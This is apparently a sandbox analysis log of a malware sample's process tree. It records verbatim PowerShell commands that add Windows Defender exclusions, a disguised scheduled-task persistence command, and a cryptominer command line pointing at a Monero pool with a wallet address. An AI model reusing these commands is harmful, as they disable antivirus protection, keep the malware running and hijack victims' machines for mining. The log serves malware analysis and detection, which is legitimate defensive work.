PID 2252 wrote to memory of 4124	2252	chrome_proxy.exe	sihost64.exe
PID 4124 wrote to memory of 4216	4124	sihost64.exe	cmd.exe
PID 4124 wrote to memory of 4216	4124	sihost64.exe	cmd.exe
PID 4216 wrote to memory of 4260	4216	cmd.exe	powershell.exe
PID 4216 wrote to memory of 4260	4216	cmd.exe	powershell.exe
PID 2252 wrote to memory of 4304	2252	chrome_proxy.exe	cmd.exe
PID 2252 wrote to memory of 4304	2252	chrome_proxy.exe	cmd.exe
PID 2252 wrote to memory of 4304	2252	chrome_proxy.exe	cmd.exe
PID 2252 wrote to memory of 4304	2252	chrome_proxy.exe	cmd.exe
PID 2252 wrote to memory of 4304	2252	chrome_proxy.exe	cmd.exe
PID 2252 wrote to memory of 4304	2252	chrome_proxy.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\LOADER\SOUFIWSHIT.exe
"C:\Users\Admin\AppData\Local\Temp\LOADER\SOUFIWSHIT.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LOADER'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3332

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome_proxy" /tr '"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"' & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:504

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "chrome_proxy" /tr '"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"'
3⤵
- Creates scheduled task(s)
PID:1764

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LOADER'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3960

C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LOADER'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome_proxy" /tr '"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "chrome_proxy" /tr '"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"'
4⤵
- Creates scheduled task(s)
PID:732

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:4216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LOADER'
5⤵
PID:4260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
5⤵
PID:4988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
5⤵
PID:4396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
5⤵
PID:764

C:\Windows\System32\cmd.exe
C:\Windows/System32\cmd.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=43HmdUkMBGF3iUAwhMgdxy5RS2N7UHuXU7p8CjtDaiDzQMcMgkGbHe52KsVhKj4vdZF9t3QjpCELRGsEy1pg4Yr1LihwNrM --pass=ICEBERG_MINER --cpu-max-threads-hint=20 --donate-level=5 --cinit-stealth
3⤵
- Blocklisted process makes network request
PID:4304

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\INSTRUCTION.txt
1⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:1256

C:\Users\Admin\AppData\Local\Temp\LOADER\SOUFIWSHIT.exe
"C:\Users\Admin\AppData\Local\Temp\LOADER\SOUFIWSHIT.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:3012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LOADER'
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome_proxy" /tr '"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"' & exit
2⤵
PID:4344

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "chrome_proxy" /tr '"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"'
3⤵
- Creates scheduled task(s)
PID:4948

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
2⤵
- Executes dropped EXE
PID:1256

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
3⤵
PID:4644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LOADER'
4⤵
PID:4144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
PID:4684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
PID:3292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
PID:4636

C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"
2⤵
- Executes dropped EXE
PID:4900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
3⤵
PID:3504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LOADER'
4⤵
PID:412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
PID:4784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
PID:3576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome_proxy" /tr '"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"' & exit
3⤵
PID:4796

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "chrome_proxy" /tr '"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"'
4⤵
- Creates scheduled task(s)
PID:4776

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
3⤵
- Executes dropped EXE
PID:3636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
4⤵
PID:5328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LOADER'
5⤵
PID:5400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
5⤵
PID:4704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
5⤵
PID:5884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
5⤵
PID:3524

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
PID:3644

C:\Users\Admin\AppData\Local\Temp\LOADER\SOUFIWSHIT.exe
"C:\Users\Admin\AppData\Local\Temp\LOADER\SOUFIWSHIT.exe"
1⤵
PID:4412

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
2⤵
PID:4572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LOADER'
3⤵
PID:4704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
3⤵
PID:3164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
3⤵
PID:4996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
3⤵
PID:5032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome_proxy" /tr '"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"' & exit
2⤵
PID:5048

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "chrome_proxy" /tr '"C:\Users\Admin\AppData\Local\Temp\chrome_proxy.exe"'
3⤵
- Creates scheduled task(s)
PID:4168

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4884

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
PID:4840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
PID:764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffdeb3d4f50,0x7ffdeb3d4f60,0x7ffdeb3d4f70
2⤵
PID:5104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1512 /prefetch:2
2⤵
PID:544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1860 /prefetch:8
2⤵
PID:4316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 /prefetch:8
2⤵
PID:4296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2600 /prefetch:1
2⤵
PID:4596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:1
2⤵
PID:2132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
2⤵
PID:1340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
2⤵
PID:2140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
2⤵
PID:4832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
2⤵
PID:1732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4788 /prefetch:8
2⤵
PID:2296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8
2⤵
PID:2748

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
2⤵
PID:3592

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff66ef4a890,0x7ff66ef4a8a0,0x7ff66ef4a8b0
3⤵
PID:4852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
2⤵
PID:2960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
2⤵
PID:5084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6700 /prefetch:8
2⤵
PID:2280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6632 /prefetch:8
2⤵
PID:4216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6624 /prefetch:8
2⤵
PID:5056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6508 /prefetch:8
2⤵
PID:1548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6860 /prefetch:8
2⤵
PID:1516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6808 /prefetch:8
2⤵
PID:4232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7204 /prefetch:8
2⤵
PID:3100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:1
2⤵
PID:4948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7688 /prefetch:8
2⤵
PID:5100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7720 /prefetch:8
2⤵
PID:4620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7928 /prefetch:1
2⤵
PID:4776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8108 /prefetch:8
2⤵
PID:2240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:8
2⤵
PID:4604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3756 /prefetch:8
2⤵
PID:4556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7328 /prefetch:8
2⤵
PID:4472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7532 /prefetch:8
2⤵
PID:4528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,12285215889242157216,16296269479652608471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7440 /prefetch:8
2⤵
PID:3932

C:\Program Files\Google\Chrome\Application\chrome.exe
